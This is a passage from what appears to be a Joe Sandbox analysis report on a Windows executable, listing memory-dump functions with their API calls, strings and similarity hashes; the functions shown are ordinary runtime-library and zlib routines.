memcpy_s.LIBCPMT ref: 00007FF6BA3C524C

Strings

1#QNAN, xrefs: 00007FF6BA3C4213
1#IND, xrefs: 00007FF6BA3C41E7
1#INF, xrefs: 00007FF6BA3C4223
1#SNAN, xrefs: 00007FF6BA3C420A

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
Instruction ID: 9343d6cfe8d8acdfccb228a07d02e2ae696a547445aa9bb474c06ba9a358bff8
Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
Instruction Fuzzy Hash: 20B2B272E183A28BE7A58E68D9447FD77A1FB54388F505175DF0AD7A84EF38A900CB40

Function 00007FF6BA3AACAD Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

invalid distance too far back, xrefs: 00007FF6BA3AB670
invalid literal/lengths set, xrefs: 00007FF6BA3AB133
invalid distances set, xrefs: 00007FF6BA3AB1A0
invalid distance code, xrefs: 00007FF6BA3AB5B4
invalid code -- missing end-of-block, xrefs: 00007FF6BA3AB0C6
invalid bit length repeat, xrefs: 00007FF6BA3AB099
too many length or distance symbols, xrefs: 00007FF6BA3AAE46
invalid code lengths set, xrefs: 00007FF6BA3AAE2D
invalid literal/length code, xrefs: 00007FF6BA3AB3E2

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
Instruction ID: 33add4381013bbce853c33657467b4592de908ee64912155ed6161dc6c7eb98a
Opcode Fuzzy Hash: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
Instruction Fuzzy Hash: 9052A272A146B68BDBA48F18D458B7E3BAAEB45340F418179EB4AC7780DF3DD944CB40

Function 00007FF6BA3AD12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6BA3AD148
RtlCaptureContext.KERNEL32 ref: 00007FF6BA3AD175
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6BA3AD18F
RtlVirtualUnwind.KERNEL32 ref: 00007FF6BA3AD1D0
IsDebuggerPresent.KERNEL32 ref: 00007FF6BA3AD224
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6BA3AD241
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6BA3AD24C

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction ID: 2a263cee899eb05c8893552b5cfa0bc6d4b8e3c0ba065ec74635e73e455b4807
Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction Fuzzy Hash: 53313E72A08B918AEB609F64E8803EE7365FB84744F44407ADB4E87B98EF3CD548C710

Function 00007FF6BA3C5C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6BA3C5C45

Part of subcall function 00007FF6BA3C5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C55AC

Part of subcall function 00007FF6BA3BA948: RtlFreeHeap.NTDLL(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA95E
Part of subcall function 00007FF6BA3BA948: GetLastError.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA968

Part of subcall function 00007FF6BA3BA900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6BA3BA8DF,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BA909
Part of subcall function 00007FF6BA3BA900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6BA3BA8DF,?,?,?,?,?,00007FF6BA3BA7CA), ref: 00007FF6BA3BA92E

_get_daylight.LIBCMT ref: 00007FF6BA3C5C34

Part of subcall function 00007FF6BA3C55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C560C

_get_daylight.LIBCMT ref: 00007FF6BA3C5EAA
_get_daylight.LIBCMT ref: 00007FF6BA3C5EBB
_get_daylight.LIBCMT ref: 00007FF6BA3C5ECC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6BA3C610C), ref: 00007FF6BA3C5EF3

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
Instruction ID: f298a274bc8e03f4046c82add987d87bd82ab5ba2314ab19afe7e84179069e03
Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
Instruction Fuzzy Hash: ECD1D022E1876286E720EF2ADC411B96761EF84784F848176EF4EC7696EF3DE841C740

Function 00007FF6BA3BA614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6BA3BA68D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6BA3BA6A5
RtlVirtualUnwind.KERNEL32 ref: 00007FF6BA3BA6E0
IsDebuggerPresent.KERNEL32 ref: 00007FF6BA3BA719
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6BA3BA723
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6BA3BA72E

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction ID: 55eea416681c13cdf040abc439ccdb9edd9fdaa6947950bc24db9b922e97bd58
Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction Fuzzy Hash: 88313B36A18F8186DB608F29E8402AE73A5FB88758F540275EF9D83B95EF3CD145CB00

Function 00007FF6BA3C1874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C18C0
FindFirstFileExW.KERNEL32 ref: 00007FF6BA3C19CA

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
Instruction ID: 77ecde02e2222b3ce888ce6eec87bfb90815eca06c682fd3ad276086d19994d0
Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
Instruction Fuzzy Hash: 39B1B326B18BA642EA61DB2A99001B9A391EB84BE4F445172EF5DC7BC5FF3CE441D700

Function 00007FF6BA3C5E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6BA3C5EAA

Part of subcall function 00007FF6BA3C55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C560C

_get_daylight.LIBCMT ref: 00007FF6BA3C5EBB

Part of subcall function 00007FF6BA3C5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C55AC

_get_daylight.LIBCMT ref: 00007FF6BA3C5ECC

Part of subcall function 00007FF6BA3C55C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C55DC

Part of subcall function 00007FF6BA3BA948: RtlFreeHeap.NTDLL(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA95E
Part of subcall function 00007FF6BA3BA948: GetLastError.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA968

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6BA3C610C), ref: 00007FF6BA3C5EF3

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
Instruction ID: e9805c4be31e5b39c27ff3516daa43b4c3e82a988c4f31863cc655d583939484
Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
Instruction Fuzzy Hash: 72517F32E1876286E720DF2AEC815B96761FB88784F4451B6EF4EC7696EF3CE4418740

Function 00007FF6BA3AD010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6BA3AD03C
GetCurrentThreadId.KERNEL32 ref: 00007FF6BA3AD04A
GetCurrentProcessId.KERNEL32 ref: 00007FF6BA3AD056
QueryPerformanceCounter.KERNEL32 ref: 00007FF6BA3AD066

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction ID: 76e6d5358ccfd4d67dad92eb48791a992a72e30a35c3a726a8f86720c62717aa
Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction Fuzzy Hash: 30110322B14B168AEB009F65E8542A973A4FB59758F440E31EF6DC67A4EF7CD198C340

Function 00007FF6BA3C3C10 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF6BA3C3C76
memcpy_s.LIBCPMT ref: 00007FF6BA3C3CA1

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: db01bed8cd7ffdbd9e0b0ece61dfe1888db4fd25b8776c5f34d9a18de135f502
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: 68C1B172B1D7A687E7248F29A44866AF7A1F794B84F458135DF4AC3784EE3DE801CB40

Function 00007FF6BA3AA474 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

header crc mismatch, xrefs: 00007FF6BA3AA921
unknown header flags set, xrefs: 00007FF6BA3AA4C5
, xrefs: 00007FF6BA3AA55B

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
Instruction ID: 893c83723818e525ffd1c124244fe072a0f9b74b9df91f7fc960b1939e91825b
Opcode Fuzzy Hash: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
Instruction Fuzzy Hash: 5EF14F63E187E58BEBA58B19C088A3E3AAAEF44744F064578DF49D7790DF38D941CB40

Function 00007FF6BA3C9728 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF6BA3C9977
RaiseException.KERNEL32 ref: 00007FF6BA3C9988

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
Instruction ID: 3ff2bb4fc4c1442f418f77271b80bd903212e53357afe62ff9864dc167963d0f
Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
Instruction Fuzzy Hash: 9CB12677A04B998AEB198F2DC85636C3BA0F784B48F168961DB5DC37A4DF39D451C700

Function 00007FF6BA3B39A4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF6BA3B3D54
, xrefs: 00007FF6BA3B3B12

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
Instruction ID: a47b99c23a6bbaa53f651c38d00c4c3ae7efe44057b006d0751e640cc37d7f62
Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
Instruction Fuzzy Hash: 20E17F32A08E6686EB68CE2D815013937A2FF45B48FA45379DF4EC7A94DF39E851C740

Function 00007FF6BA3AA2DB Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

invalid window size, xrefs: 00007FF6BA3AA442
incorrect header check, xrefs: 00007FF6BA3AA45B

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
Instruction ID: 6900410b13d1eaf9af2331aed199338b000d4246424bc58109057735f9e40d21
Opcode Fuzzy Hash: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
Instruction Fuzzy Hash: 50916473A182D687EBA48E18D458A3E3AAAFB45354F118179DF4AC67D0DF3CE940CB41

Function 00007FF6BA3BDEF0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

e+000, xrefs: 00007FF6BA3BDFFD
gfff, xrefs: 00007FF6BA3BE07A

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
Instruction ID: 634273dae3e47342c8d7cbefe51a6c4f035f277b436ab40b16c26c998c436eda
Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
Instruction Fuzzy Hash: 7A512662B1CAC586E7258F3E9801769BB92E744B94F889372CF98C7AC5CE3DD4458701

Function 00007FF6BA3C08C8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
Instruction ID: add518d4a3d1752e1dd203a02cc6a57568a8770430ca65695c8173cea22a6c92
Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
Instruction Fuzzy Hash: D802E521F1DBA751FE65EB1D98402792681AF46BA0F4586B5EF6DC73D2EE3CE8008310

Function 00007FF6BA3BDA5C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF6BA3BDD9E

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction ID: 639dea87f55d1187d24de812887bd949dafc9e1e178b7da1dbc7b21eeae3e485
Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction Fuzzy Hash: 52A14662B08BCA86EB21CF29A4007AA7B92EB55BC4F458272DF8DC7785DE3DD501C701

Function 00007FF6BA3B8794 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF6BA3B87B3

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

